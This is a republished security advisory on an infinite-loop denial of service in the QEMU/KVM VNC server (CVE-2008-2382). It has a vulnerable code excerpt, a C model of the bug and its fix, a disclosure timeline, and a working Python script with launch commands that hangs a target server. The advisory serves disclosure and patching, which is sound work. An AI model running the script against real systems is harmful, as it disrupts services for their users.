Credit:
The information has been provided by CORE Security Technologies Advisories.
The original article can be found at: http://www.coresecurity.com/content/vnc-remote-dos
Vulnerable Systems:
* Qemu version 0.9.1 and older
* kvm version 79 and older
Technical Description / Proof of Concept Code:
The function 'protocol_client_msg()' in the file 'vnc.c' ('qemu/vnc.c' in kvm-66) is in charge of processing incoming VNC low-level messages. A listing of the vulnerable source follows:
/-----------
vnc.c
static int protocol_client_msg(VncState *vs, uint8_t *data, size_t len)
{
    int i;
    uint16_t limit;

    switch (data[0]) {
    ...
    case 2:                 /* SetEncodings */
        if (len == 1)
            return 4;       /* wait for the 2-byte padding and 2-byte encoding count */

        if (len == 4)       /* a count of zero yields 4 again: the caller re-enters with the same 4 bytes */
            return 4 + (read_u16(data, 2) * 4);
-----------/
When the VNC server receives a message consisting of '\x02\x00\x00\x00', 'read_u16()' returns zero, so the function returns 4, the same length it was just called with. The caller therefore invokes it again with the 'len' parameter always equal to 4 and never consumes the message, and the server enters an infinite loop.
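Modelled in C as an added example (not the project's code or patch): the vulnerable 'case 2' logic from the listing next to a hardened variant that treats a zero encoding count as a complete message, driven by a minimal model of the server read loop. The read loop, the handler names, the 'MAX_ITER' cap and the sample inputs are assumptions made for this model.

```c
#include <stdint.h>
#include <stddef.h>

#define MAX_ITER 1000  /* assumed cap so the model terminates; vnc.c has none */

/* read_u16 as in vnc.c: big-endian 16-bit value at data[offset] */
static uint16_t read_u16(const uint8_t *data, size_t offset) {
    return (uint16_t)((data[offset] << 8) | data[offset + 1]);
}

/* Handler contract as in vnc.c: bytes to wait for next, or 0 when consumed. */
typedef size_t (*handler_t)(const uint8_t *data, size_t len);

/* Vulnerable SetEncodings (type 2) handling, as in the advisory listing. */
static size_t vuln_handler(const uint8_t *data, size_t len) {
    if (data[0] != 2) return 0;                       /* only type 2 is modelled */
    if (len == 1) return 4;                           /* header + 2-byte count */
    if (len == 4) return 4 + (read_u16(data, 2) * 4); /* count 0 -> 4 again */
    return 0;                                         /* all encodings read */
}

/* Hardened variant (added here, not the project's patch): a zero count means
 * the message is already complete, so the loop consumes it and moves on. */
static size_t fixed_handler(const uint8_t *data, size_t len) {
    if (data[0] != 2) return 0;
    if (len == 1) return 4;
    if (len == 4) {
        uint16_t limit = read_u16(data, 2);
        return limit > 0 ? 4 + (limit * 4) : 0;       /* 0 -> consumed */
    }
    return 0;
}

/* Assumed model of the server read loop: re-enter the handler while at least
 * 'expect' bytes are buffered. Returns iterations taken, or -1 at the cap. */
static int run_read_loop(handler_t handler, const uint8_t *buf, size_t avail) {
    size_t off = 0, expect = 1;
    int iters = 0;
    while (avail - off >= expect) {
        if (++iters > MAX_ITER) return -1;            /* the DoS: no progress */
        size_t need = handler(buf + off, expect);
        if (need == 0) { off += expect; expect = 1; } /* message consumed */
        else expect = need;                           /* wait for more bytes */
    }
    return iters;
}
/* Constructed inputs: the 4-byte trigger and a valid one-encoding message. */
static const uint8_t kZeroCount[4] = { 2, 0, 0, 0 };
static const uint8_t kOneEncoding[8] = { 2, 0, 0, 1, 0, 0, 0, 0 };
```

With the vulnerable handler the zero-count message hits the cap (-1) because no bytes are ever consumed, while the hardened handler consumes it in two iterations and still handles a real one-encoding message identically.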
Proof of Concept:
The following Python script implements a basic VNC client that triggers the vulnerability on the VNC server.
*NOTE:* Some VNC servers, like KVM, don't bind to 0.0.0.0 by default, but the server can still be reached from a guest VM when no VNC client is attached.
/-----------
Example:
Launch vulnerable qemu:
~$ qemu ./test.img -vnc 0.0.0.0:0
Launch attack:
~$ python qemu-kvm-DoS.py localhost 5900
-----------/
/-----------
##
## vnc remote DoS
##
import socket
import time
import struct
import sys

if len(sys.argv) < 3:
    print "Usage: %s host port" % sys.argv[0]
    exit(0)

host = sys.argv[1]       # "127.0.0.1" # debian 4
port = int(sys.argv[2])  # 5900

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

# rec-send versions: echo the server's RFB version string back as ours
srvversion = s.recv(100)
cliversion = srvversion
s.send(cliversion)
print "Server version: %s" % srvversion

# Security types: pick the first one the server offers
sec = s.recv(100)
print "Number of security types: %d" % ord(sec[0])
s.send(sec[1])

# Authentication result
auth = s.recv(100)
if auth == "\x00\x00\x00\x00":
    print "Auth ok."

# Share desktop flag: no
s.send("\x00")

# Server framebuffer parameters:
framebuf = s.recv(100)

# Trigger the bug: SetEncodings (type 2) with an encoding count of zero
s.send("\x02\x00\x00\x00\x00\xff" + struct.pack("<L", 1) * 5)
s.close()
-----------/
Report Timeline:
2008-12-10: Core Security Technologies notifies the Qemu, Xen and KVM teams of the vulnerability.
2008-12-11: KVM team acknowledges notification.
2008-12-12: Core sends technical details of the vulnerability to the KVM team.
2008-12-13: KVM team informs that it will inform the Qemu team, since the vulnerable code is inherited from Qemu.
2008-12-16: Core replies that the vulnerability is present in Qemu, KVM and Xen, and that its intention is to coordinate the disclosure of this issue with the three teams. The proposed publication date is January 5th, 2009.
2008-12-16: Xen team acknowledges notification.
2008-12-16: Core sends technical details to the Xen team.
2008-12-16: Qemu team confirms the vulnerability, and has patches ready.
2008-12-17: Xen informs that they are not vulnerable.
2008-12-17: Core proposes to disclose the issue on December 22nd, 2008, if both Qemu and KVM have patches ready.
2008-12-18: Qemu and KVM teams agree to publish the issue on Dec 22.
2008-12-22: The advisory CORE-2008-1210 is published.
CVE Information:
CVE-2008-2382